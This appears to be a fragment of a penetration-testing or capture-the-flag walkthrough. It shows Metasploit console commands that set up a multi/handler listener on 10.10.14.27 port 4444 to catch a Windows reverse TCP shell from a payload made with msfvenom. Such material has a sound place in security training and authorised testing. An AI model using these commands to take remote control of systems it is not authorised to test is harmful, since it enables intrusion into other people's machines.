use exploit/multi/handler
// The payload should be the same as the one, you used to generate
the payload using msfvenom
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.27
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit